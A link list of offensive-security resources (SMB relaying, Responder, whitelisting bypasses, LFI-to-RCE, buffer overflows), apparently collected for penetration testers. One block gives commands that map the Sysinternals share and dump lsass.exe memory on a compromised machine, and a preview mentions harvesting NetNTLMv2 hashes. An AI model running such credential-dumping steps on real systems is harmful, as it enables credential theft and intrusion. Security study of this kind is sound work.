Effective NTLM / SMB Relaying
https://room362.com/post/2014/2014-05-21-effective-ntlm-slash-smb-relaying/
  
Room362
  
  Effective NTLM / SMB Relaying · Rob 'mubix' Fuller
  SMB Relay has been around for a long while. I even have a post about using it along with LNK files here:
MS08-068 + MS10-046 = Fun until 2018
Here is the problem though. Most of the tools to exploit it either catch the authentication in NTLMv2/NTLMv1 (which…
Fun with LDAP, Kerberos (and MSRPC) in AD Environments 
https://speakerdeck.com/ropnop/fun-with-ldap-kerberos-and-msrpc-in-ad-environments
  
Speaker Deck
  
  Slides from my Track X Thotcon 2018 Workshop entitled: "Fun with LDAP, Kerberos (and MSRPC) in AD Environments"
If you want the embedded Gifs/Vide…
Interesting vuln allows attacker to bypass auth for android phone by taking a Skype call ☎️ 🔓
https://youtu.be/EiEcwOfTFqI
  
YouTube
  
  Skype Android Authentication Bypass
Florian Kunushevci
https://www.linkedin.com/in/floriankunushevci/
https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2019-0622
Map #Sysinternals tools folder locally, run tools when required. Useful on a compromised remote machine to avoid tool clutter.
net use Z: \\live.sysinternals.com\tools\ "/user:"
dir Z:
Z:\procdump -accepteula -ma lsass.exe lsassdmp
Pwning with Responder – A Pentester’s Guide
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
WMIC.EXE Whitelisting Bypass - Hacking with Style, Stylesheets 
https://subt0x11.blogspot.com/2018/04/wmicexe-whitelisting-bypass-hacking.html
Mobile Application Penetration Testing Cheat Sheet
https://github.com/sh4hin/MobileApp-Pentest-Cheatsheet
  
GitHub
  
  GitHub - sh4hin/MobileApp-Pentest-Cheatsheet: The Mobile App Pentest cheat sheet was created to provide concise collection of high…
  The Mobile App Pentest cheat sheet was created to provide concise collection of high value information on specific mobile application penetration testing topics. - sh4hin/MobileApp-Pentest-Cheatsheet
SMTP Log Poisoning through LFI to Remote Code Execution
https://www.hackingarticles.in/smtp-log-poisioning-through-lfi-to-remote-code-exceution/
  
Hacking Articles
  
  SMTP Log Poisoning through LFI to Remote Code Execution - Hacking Articles
  In this Post, we will be discussing on SMTP log poisoning. But before getting in details, kindly read our previous articles for “SMTP Lab Set-Up”
Buffer Overflow Practical Examples, metasploit, gdb and objdump! - protostar stack3
https://0xrick.github.io/binary-exploitation/bof3/
  
0xRick's Blog
  
  Buffer Overflow Examples, Overwriting a function pointer - protostar stack3
  Another post where I overwrite a variable value which is used as a function pointer. (x32)
  BOVSTT – Buffer Overflow Vulnerability Services Tester Tool
https://hakin9.org/bovstt-buffer-overflow-vulnerability-services-tester-tool/
COM XSL Transformation: Bypassing Microsoft Application Control Solutions (CVE-2018-8492)
https://bohops.com/2019/01/10/com-xsl-transformation-bypassing-microsoft-application-control-solutions-cve-2018-8492/
  
bohops
  
  Introduction Greetings, Everyone!  It has been several months since I’ve blogged, so it seems fitting to start the New Year off with a post about two topics that I thoroughly enjoy exploring: …
  Some CNA scripts with great ideas like Invoke-CredLeak to get the NETNTLMv2 hash for a user when on a machine for cracking.
https://github.com/vysecurity/Aggressor-VYSEC
  
GitHub
  
  GitHub - vysecurity/Aggressor-VYSEC
  